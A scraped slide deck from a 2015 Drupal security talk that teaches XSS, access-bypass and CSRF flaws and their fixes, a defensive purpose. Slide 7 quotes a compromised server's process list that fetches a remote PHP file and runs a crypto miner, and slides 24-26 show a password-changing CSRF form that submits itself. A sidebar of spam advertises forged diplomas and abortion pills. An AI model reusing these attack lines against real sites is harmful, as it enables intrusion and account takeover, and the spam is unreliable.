AI Generated 3D Models | AI 3D Model GeneratorAI Generated 3D Models | AI 3D Model Generator
AI Generated 3D Models | AI 3D Model Generator
 
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书
 
Premier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdfPremier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdf
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
 
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays SweatshirtsFree on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirts
 
Free scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirtsFree scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirts
 
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样
 
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
 
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at  CaribNOG 27APNIC Updates presented by Paul Wilson at  CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27
 
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理
 
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
 
一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理
 
Statistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdfStatistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdf
 
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
 
一比一定制波士顿学院毕业证学位证书
一比一定制波士顿学院毕业证学位证书一比一定制波士顿学院毕业证学位证书
一比一定制波士顿学院毕业证学位证书
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理
 
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样
 
原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样
 
I’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 ShirtI’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 Shirt
 

Secure Drupal, from start to finish (European Drupal Days 2015)

  • 1. © Ibuildings 2014/2015 - All rights reserved #DrupalDaysEU Secure Drupal From start to finish
  • 2. © Ibuildings 2014/2015 - All rights reserved Speaker Info Boy Baukema Security Specialist boy@ibuildings.nl @relaxnow
  • 3. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Security Specialist • R&D Security • Internal & External • Security Training • Consulting • Security Audits A Security what?
  • 4. © Ibuildings 2014/2015 - All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
  • 5. © Ibuildings 2014/2015 - All rights reserved
  • 6. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 7. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved /usr/sbin/apache2  -­‐k  start    _  /usr/sbin/apache2  -­‐k  start      _  /usr/local/php539/bin/php-­‐cgi              -­‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/ one.txt              -­‐dallow_url_include=on              _  sh  -­‐c  /tmp/sh.sh                      _  ./minerd                              -­‐a  scrypt                              -­‐o  stratum+tcp://multi.ghash.io:3333                              -­‐u  lscllc.worker16                              -­‐p  x Such hacked. Much coins.
  • 8. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved [20:51:04]  root@bal-­‐XXXX.prod:/var/log/nginx#   zgrep  "POST  /  HTTP/1.1"  access.log  |  egrep  -­‐o   'forwarded_for="[^s,"]+?'  |  cut  -­‐d'"'  -­‐f2  |   sort  |  uniq  -­‐c  |  sort  -­‐nr  |  head  -­‐30        2112  104.130.25.XXX        1144  37.221.162.XXX        1067  185.13.37.XXX        1066  77.247.181.XXX        1058  77.109.141.XXX        1047  5.135.158.XXX        1042  178.175.139.XXX HTTP Flood
  • 9. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 10. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Drupal Top 3
 • Secure Development Lifecycle
 • The Law The Plan
  • 11. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved // to expand it out into a comma-delimited set of placeholders. foreach (array_filter($args, 'is_array') as $key => $data) { $new_keys = array(); foreach ($data as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate /includes/database/database.inc
  • 12. © Ibuildings 2014/2015 - All rights reserved This is the Talk Title and it could be very long, for example on two lines or more Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/ 201403/drupal-security-whitepaper-1-3.pdf
  • 13. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved /** * Preprocess function to replace the regular label with the * display label */ function field_display_label_preprocess_field(&$variables) { $field = field_info_instance(...); if ( isset($field['display_label']) && strlen(trim($field['display_label'])) > 0 ) { $variables['label'] = $field['display_label']; 1. XSS From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module? id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
  • 14. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved 1. drupal_set_message 2. l 3. watchdog Which function(s) should receive check_plain() content
  • 15. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved 1. drupal_set_message 2. l 3. watchdog Which function(s) should receive check_plain() content Use t('@') syntax! $text = t( "@name's blog", [ '@name' => format_username($account) ] );
  • 16. © Ibuildings 2014/2015 - All rights reserved Filter Input As early as possible
  • 17. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved $_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv everything from the database
 $form_state (mostly ['input']) arg drupal_get_query_parameters drupal_current_script_url drupal_detect_baseurl request_path What is input?
  • 18. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Sanitize: $id = (int) arg(1); $accountEnabled = (bool) arg(1); Validate:
 Form validators in_array() mb_strlen() > 1024 url_is_external valid_url Filter / Sanitize / Validate
  • 19. © Ibuildings 2014/2015 - All rights reserved Encode Output As late as possible
  • 20. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 21. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved // This is to be accessible to all users, // so 'access callback' can be set // to TRUE, meaning that we should // bypass all access checks. 'access callback' => TRUE, 2. Access Bypass
  • 22. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved global $user; if ($user->uid = 1) { watchdog('mymodule', request_uri()); } A disturbance in the force
  • 23. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • IDE / code sniffer (coder tools) • if (1 = $uid) • === instead of == • user_uid_optional_load($uid = NULL) Avoiding accidental assign
  • 24. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved <form
 action="http://mysite.com/contact"
 method="post"
 /> 3. Cross Site Request Forgery
  • 25. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved <form
 action="https://www.drupal.org/user/2457520/edit"
 method="post">
 <input type="hidden"
 name="pass[pass1]" 
 value="hacked1" 
 /> 3. Cross Site Request Forgery
  • 26. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved <script>
 $('#contactform').submit();
 </script> 3. Cross Site Request Forgery
  • 27. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 28. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved => drupal_get_token <= drupal_valid_token Drupal Forms to the rescue!
  • 29. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Authentication / Session • Arbitrary Code Execution • Denial of Service • Information Disclosure • Logic error • Open Redirect • Password Protection Bypass • Session Fixation • SQL Injection • .... 4. Others
  • 30. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 31. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 32. © Ibuildings 2014/2015 - All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
  • 33. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved 1. Education & Guidance
  • 34. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Threat Assessment
 • Security Requirements
 2. Design time security
  • 35. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Architecture Review
 • Code Review 3. Security Review
  • 36. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved 4. Security Testing The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls.
  • 37. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Identify third party dependencies • ... follow their Security Mailinglists • Make rebuilding painless. • Make redeploying painless. • Backup & restore from backup 'regularly' 5. Vulnerability Management
  • 38. © Ibuildings 2014/2015 - All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
  • 39. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors
  • 40. © Ibuildings 2014/2015 - All rights reserved The Law
  • 41. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved the penalty for failure to adopt the minimum measures is that of Article 169 of the Code 
 (imprisonment up to two years); damages -the manager has the burden of proof that he took all that was possible to avoid the damage, referring to appropriate practice known techniques of computer security , while the victim must only prove the existence of damage. Misure minime di sicurezza
  • 42. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Individually associated accounts • > 8 character passwords • Changed every 3 to 6 months • Do not leave admin unattended • Privileges on need to know basis • Verify privileges at least yearly • Update at least every 6 months • Backup data at least weekly Disciplinare tecnico
  • 43. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Gold Sponsors Bob's Story
  • 44. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved Responsible Disclosure
  • 45. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • Know your law • Think like an attacker • ... but don't become one (without permission) • Make sure white hats have a place to go • Filter Input, Encode Output • Train your developers • Design with security in mind • Review and be critical • Trust but verify that you are secure • Perform active automated maintenance In summary
  • 46. #DrupalDaysEU © Ibuildings 2014/2015 - All rights reserved • http://www.slideshare.net/relaxnow/drupaldays-2015 • http://crackingdrupal.com • http://drupalsecurityreport.com • http://drupal.org/writing-secure-code • http://owasp.org • OWASP ASVS The End